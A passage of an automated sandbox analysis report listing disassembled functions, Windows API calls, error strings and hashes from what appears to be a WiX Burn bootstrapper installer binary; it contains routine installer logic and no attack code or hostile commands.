                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,?,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 004039C8
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00439757,?,?,00000000,0000FDE9,?,?,?,?,00439105,?,?), ref: 004039D4
                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,?,?,?,00000000,?,?,?,00439757,?,?,00000000,0000FDE9), ref: 00403AD0
                                                                                                                                                          • GetLastError.KERNEL32(?,?,00439757,?,?,00000000,0000FDE9,?,?,?,?,00439105,?,?), ref: 00403ADA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharErrorLastMultiWide
                                                                                                                                                          • String ID: Not enough memory to allocate string of size: %u$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\strutil.cpp$failed to allocate string, len: %u$failed to convert to unicode: %s$failed to get required size for conversion to unicode: %s$failed to get size of destination string
                                                                                                                                                          • API String ID: 203985260-3732632410
                                                                                                                                                          • Opcode ID: 1b1425c6b059dc0c19e6607b41a5d914db3a5f20bc947f3e12578369cd4cf98e
                                                                                                                                                          • Instruction ID: 6ab57f18384f71150fd1895267d6bae1e55fb2907d6f6ebca5e531b7a0e6c05b
                                                                                                                                                          • Opcode Fuzzy Hash: 1b1425c6b059dc0c19e6607b41a5d914db3a5f20bc947f3e12578369cd4cf98e
                                                                                                                                                          • Instruction Fuzzy Hash: 1A514971B80224BBD7219E548C4AF6B3A5CAF00765F11417AFA45BB2D1E6B89E009B9C
                                                                                                                                                          Function 004364C4 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 138COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to read API version of BAEngineEscapeString results., xrefs: 0043654C
                                                                                                                                                          • Failed to read API version of BAEngineEscapeString args., xrefs: 004364F4
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\baengine.cpp, xrefs: 00436630
                                                                                                                                                          • Failed to write length of formatted string of BAEngineEscapeString struct., xrefs: 004365F9
                                                                                                                                                          • Failed to read allowed length of escaped string of BAEngineEscapeString results., xrefs: 00436575
                                                                                                                                                          • Failed to format string, xrefs: 0043659E
                                                                                                                                                          • Failed to write size of BAEngineEscapeString struct., xrefs: 004365D4
                                                                                                                                                          • Failed to write formatted string of BAEngineEscapeString struct., xrefs: 0043661E
                                                                                                                                                          • Failed to read string to escape of BAEngineEscapeString args., xrefs: 0043651D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to format string$Failed to read API version of BAEngineEscapeString args.$Failed to read API version of BAEngineEscapeString results.$Failed to read allowed length of escaped string of BAEngineEscapeString results.$Failed to read string to escape of BAEngineEscapeString args.$Failed to write formatted string of BAEngineEscapeString struct.$Failed to write length of formatted string of BAEngineEscapeString struct.$Failed to write size of BAEngineEscapeString struct.$d:\a\wix\wix\src\burn\engine\baengine.cpp
                                                                                                                                                          • API String ID: 0-3275373110
                                                                                                                                                          • Opcode ID: 854c732bf0c90a2e007c9958dd7bedd837ef0c753801ac8ca4391e5cc88ed7a4
                                                                                                                                                          • Instruction ID: 817f2c2bd4c90427b9536e38395d7ff21cb851b26c5f76e4e8024a84c095dbab
                                                                                                                                                          • Opcode Fuzzy Hash: 854c732bf0c90a2e007c9958dd7bedd837ef0c753801ac8ca4391e5cc88ed7a4
                                                                                                                                                          • Instruction Fuzzy Hash: 8C41D731E81726B7EF129A54CC07FDF7E649B14B50F214167FA04BA1D0E2B89E408B9D
                                                                                                                                                          Function 004140F5 Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 100COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004141E4
                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004141F5
                                                                                                                                                            • Part of subcall function 0042248F: CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224F7
                                                                                                                                                            • Part of subcall function 0042248F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0043ED20,8000FFFF,?,?,08000000,00000000,00000000,?), ref: 004224FD
                                                                                                                                                          Strings
                                                                                                                                                          • burn.ba.apiver, xrefs: 0041411C
                                                                                                                                                          • Failed to allocate full command-line for bootstrapper application process., xrefs: 0041417E
                                                                                                                                                          • -%ls %llu -%ls %ls %ls, xrefs: 00414121
                                                                                                                                                          • "%ls" %ls, xrefs: 0041416A
                                                                                                                                                          • Failed to allocate parameters for bootstrapper application process., xrefs: 00414140
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp, xrefs: 00414152, 004141C2
                                                                                                                                                          • burn.ba.pipe, xrefs: 0041410C
                                                                                                                                                          • Failed to launch bootstrapper application process: %ls, xrefs: 004141B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                          • String ID: "%ls" %ls$-%ls %llu -%ls %ls %ls$Failed to allocate full command-line for bootstrapper application process.$Failed to allocate parameters for bootstrapper application process.$Failed to launch bootstrapper application process: %ls$burn.ba.apiver$burn.ba.pipe$d:\a\wix\wix\src\burn\engine\bootstrapperapplication.cpp
                                                                                                                                                          • API String ID: 161867955-3783781504
                                                                                                                                                          • Opcode ID: d756e6b431d6569be8cdbf5cf63dd028b978ef18e84709fc4eec63a9f8de05c7
                                                                                                                                                          • Instruction ID: eb299b18c28f3289645a04e721287f6f763841a107e2aa9f4210c753d361d0eb
                                                                                                                                                          • Opcode Fuzzy Hash: d756e6b431d6569be8cdbf5cf63dd028b978ef18e84709fc4eec63a9f8de05c7
                                                                                                                                                          • Instruction Fuzzy Hash: 4E31CF71E80219BBEF119F90CC46EEFBF75EF18754F504066FA04792A0D2B84E909A99
                                                                                                                                                          Function 004430C4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 245COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CompareStringW.KERNEL32(00000000,00000000,00477850,000000FF,feclient.dll,000000FF,00000000,00000000,?,00000000,00000000), ref: 0044313B
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to insert execute action., xrefs: 004431A0
                                                                                                                                                          • Failed to grow array of ordered patches., xrefs: 00443307
                                                                                                                                                          • feclient.dll, xrefs: 00443131, 00443253
                                                                                                                                                          • Failed to copy target product code., xrefs: 00443266
                                                                                                                                                          • Failed to get msp ui options., xrefs: 004432AE
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\mspengine.cpp, xrefs: 004431FA
                                                                                                                                                          • Failed to plan action for target product., xrefs: 004431E8
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CompareString
                                                                                                                                                          • String ID: Failed to copy target product code.$Failed to get msp ui options.$Failed to grow array of ordered patches.$Failed to insert execute action.$Failed to plan action for target product.$d:\a\wix\wix\src\burn\engine\mspengine.cpp$feclient.dll
                                                                                                                                                          • API String ID: 1825529933-2136478367
                                                                                                                                                          • Opcode ID: 1728a37997e106c652ae82592478484f1523975b2eacbde67368181158570dc8
                                                                                                                                                          • Instruction ID: bd5af6159679b93b4707498a97378bed5d81601d916fa338369ce0a4db0281c3
                                                                                                                                                          • Opcode Fuzzy Hash: 1728a37997e106c652ae82592478484f1523975b2eacbde67368181158570dc8
                                                                                                                                                          • Instruction Fuzzy Hash: 6EA1A075A00209EFEB14CF94C981F9A7BB4FF08715F1141AAE905AB391C774EE41CB54
                                                                                                                                                          Function 004704C2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 163registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,000000B0), ref: 00470660
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\file2utl.cpp, xrefs: 0047063A
                                                                                                                                                          • Failed to compare path from pending file rename to check path., xrefs: 0047066F
                                                                                                                                                          • Failed to update pending file renames., xrefs: 0047062B
                                                                                                                                                          • Failed to open pending file rename registry key., xrefs: 00470515
                                                                                                                                                          • Failed to read pending file renames., xrefs: 00470562
                                                                                                                                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004704D3
                                                                                                                                                          • PendingFileRenameOperations, xrefs: 00470536, 00470618
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: Failed to compare path from pending file rename to check path.$Failed to open pending file rename registry key.$Failed to read pending file renames.$Failed to update pending file renames.$PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\file2utl.cpp
                                                                                                                                                          • API String ID: 3535843008-29367118
                                                                                                                                                          • Opcode ID: eeec8495158b9aa6dc5c94e27d51d319d2ec86f2ddf90e798a10c59388f3b778
                                                                                                                                                          • Instruction ID: d4225f3126f7d35013523cc3c9790edbcc6d98189b7feaa42f45d7e0af99bbf8
                                                                                                                                                          • Opcode Fuzzy Hash: eeec8495158b9aa6dc5c94e27d51d319d2ec86f2ddf90e798a10c59388f3b778
                                                                                                                                                          • Instruction Fuzzy Hash: 1D51CD71E41219FBCB30DE59CC41FEFBBB8AF40700F11815BA908BB291D679DE109A99
                                                                                                                                                          Function 004080F0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 132COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 004016CA: WaitForMultipleObjects.KERNEL32(?,?,000000FF,00000000,00000000,?,?,00439EE2,00000002,000000FF,00000000,000000FF,?,?,00000000), ref: 004016DE
                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,00000002,?,00000000,000000FF,00000000), ref: 0040813F
                                                                                                                                                          • ResetEvent.KERNEL32(?), ref: 00408155
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040815F
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 00408169
                                                                                                                                                            • Part of subcall function 004662D8: EnterCriticalSection.KERNEL32(004B2588,00000000,?,004097D3,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004662E2
                                                                                                                                                            • Part of subcall function 004662D8: LeaveCriticalSection.KERNEL32(004B2588,?,004097D3,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004662F9
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to reset log event., xrefs: 004081F0
                                                                                                                                                          • Failed to wait for log thread events, signaled: %u., xrefs: 0040821D
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\engine.cpp, xrefs: 004081E6, 00408202, 0040822F
                                                                                                                                                          • Failed to wait log message over pipe., xrefs: 004081A6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$EnterLeave$ErrorEventLastMultipleObjectsResetWait
                                                                                                                                                          • String ID: Failed to reset log event.$Failed to wait for log thread events, signaled: %u.$Failed to wait log message over pipe.$d:\a\wix\wix\src\burn\engine\engine.cpp
                                                                                                                                                          • API String ID: 3117541546-979359555
                                                                                                                                                          • Opcode ID: 82b12ef57d286a6714d2baf942b8aaf9c9bd32228a56724dbfe3d55c8ba4d6db
                                                                                                                                                          • Instruction ID: 2ad97e5346123ddba149f314574b3e0424aaec4d09e24195b983836bf61d01ca
                                                                                                                                                          • Opcode Fuzzy Hash: 82b12ef57d286a6714d2baf942b8aaf9c9bd32228a56724dbfe3d55c8ba4d6db
                                                                                                                                                          • Instruction Fuzzy Hash: FE412B31A40724BBEB207BA28D06F9F7668AF20B15F10417FF644791C1DBBC599086DE
                                                                                                                                                          Function 0041EC50 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 126COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041ED7F
                                                                                                                                                          • Failed to set last source., xrefs: 0041ED6D
                                                                                                                                                          • Failed to determine length of source path., xrefs: 0041EC80
                                                                                                                                                          • Failed to determine length of relative path., xrefs: 0041ECAA
                                                                                                                                                          • WixBundleLastUsedSource, xrefs: 0041ED1A, 0041ED20, 0041ED5E
                                                                                                                                                          • Failed to trim source folder., xrefs: 0041ED03
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 0-1489649792
                                                                                                                                                          • Opcode ID: 05f28a89d7a944a17f6b4187338f8057aa84ab2c263e7d4d6e90e1c0e1fce1f2
                                                                                                                                                          • Instruction ID: 2c4fc532b024d851301bb95dbf2caec54f9858b0e31bdde6b6b829efe48cdc2a
                                                                                                                                                          • Opcode Fuzzy Hash: 05f28a89d7a944a17f6b4187338f8057aa84ab2c263e7d4d6e90e1c0e1fce1f2
                                                                                                                                                          • Instruction Fuzzy Hash: 09410B31E40216BBDB219A96CC46FDF7E79DB44B21F210267FD14BA1D0E7B49A808798
                                                                                                                                                          Function 0041B39D Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 121stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(64681479,00000000,00000000,00000004,?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000), ref: 0041B3D1
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00450A96,00000000,?,?,00000000,00000000,00000000,00000004,00000000), ref: 0041B3DC
                                                                                                                                                            • Part of subcall function 0046EEDB: SetNamedPipeHandleState.KERNEL32(0041B403,00000001,00000000,00000000,?,00000000,00000000,?,?,0041B403,00477850), ref: 0046EEF6
                                                                                                                                                            • Part of subcall function 0046EEDB: GetLastError.KERNEL32(?,?,0041B403,00477850), ref: 0046EF00
                                                                                                                                                            • Part of subcall function 00405C1E: WriteFile.KERNEL32(0046EC8C,?,?,00000000,00000000,0046EC90,00000000,00000000,?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?), ref: 00405C43
                                                                                                                                                            • Part of subcall function 00405C1E: GetLastError.KERNEL32(?,?,0046F0F2,0046EC8C,00000000,0046EC8C,?,?,?,00000000,0046EC8C,0046EC8C,00000000), ref: 00405C4D
                                                                                                                                                            • Part of subcall function 00405174: ReadFile.KERNEL32(00000008,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0046ECC1,00000000,?,00000008,00000000,?), ref: 00405199
                                                                                                                                                            • Part of subcall function 00405174: GetLastError.KERNEL32(?,?,0046ECC1,00000000,?,00000008,00000000,?,?,?), ref: 004051A3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$File$CurrentHandleNamedPipeProcessReadStateWritelstrlen
                                                                                                                                                          • String ID: Failed to read ACK from pipe.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$d:\a\wix\wix\src\burn\engine\burnpipe.cpp
                                                                                                                                                          • API String ID: 64288487-2886315797
                                                                                                                                                          • Opcode ID: ebf12ba17b445bc6b2cd6f78bd68de73436f545e2f9564c4efc98d448839a2fb
                                                                                                                                                          • Instruction ID: 359c8ad8b16cfdf8eaee61de0b70a714035ab242fa93b9d29843b94662e5e77b
                                                                                                                                                          • Opcode Fuzzy Hash: ebf12ba17b445bc6b2cd6f78bd68de73436f545e2f9564c4efc98d448839a2fb
                                                                                                                                                          • Instruction Fuzzy Hash: C431D631E413147BD710EA598C46FEF7AA8DB09B10F20412BFA04FB2D1D3B899418BE9
                                                                                                                                                          Function 0046B065 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 112memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0046B079
                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0046B085
                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0046B174
                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0046B17F
                                                                                                                                                          Strings
                                                                                                                                                          • failed getNamedItem in XmlGetAttribute(%ls), xrefs: 0046B0E1
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp, xrefs: 0046B0B7, 0046B0F0
                                                                                                                                                          • failed get_attributes, xrefs: 0046B0A8
                                                                                                                                                          • failed get_nodeValue in XmlGetAttribute(%ls), xrefs: 0046B11F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                          • String ID: d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\xmlutil.cpp$failed getNamedItem in XmlGetAttribute(%ls)$failed get_attributes$failed get_nodeValue in XmlGetAttribute(%ls)
                                                                                                                                                          • API String ID: 760788290-3149762594
                                                                                                                                                          • Opcode ID: 065ef153bca2c45b574a7080694961f324a1acdc32fd332f05d3a9c3d14fee72
                                                                                                                                                          • Instruction ID: bf2c3060670f320e3a600a552281a1a1305079b4d0aaa949db8656d3325c41e4
                                                                                                                                                          • Opcode Fuzzy Hash: 065ef153bca2c45b574a7080694961f324a1acdc32fd332f05d3a9c3d14fee72
                                                                                                                                                          • Instruction Fuzzy Hash: 1E31DF35B00208BBDB149F94CC59FAE3B79EB85751F10006AF905EB290EB749D80CBD9
                                                                                                                                                          Function 00402556 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 112COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000105,00000000,00000000,00000105,00000000,00000000,00000000,?,?,?,0040679E,?,00000000,00000000,00000000,0100147D), ref: 004025A2
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory
                                                                                                                                                          • String ID: Failed to allocate space for current directory.$Failed to get current directory.$Failed to get max length of input buffer.$Failed to reallocate space for current directory.$GetCurrentDirectoryW results never converged.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\dirutil.cpp
                                                                                                                                                          • API String ID: 1611563598-3550776927
                                                                                                                                                          • Opcode ID: 1553b8e0699264b0510309d5ad2cba5700c4149eaf91a6ea3eef1446d421d70e
                                                                                                                                                          • Instruction ID: 6c28705d65b585aa3a9f48d142f5b8427bc8d936441c59d46eb549a22b9a6fa6
                                                                                                                                                          • Opcode Fuzzy Hash: 1553b8e0699264b0510309d5ad2cba5700c4149eaf91a6ea3eef1446d421d70e
                                                                                                                                                          • Instruction Fuzzy Hash: C7310472B8132577E72156558E5DFAB6A5C8B09B90F01447BFE08BB2D0DAFDCC0146AC
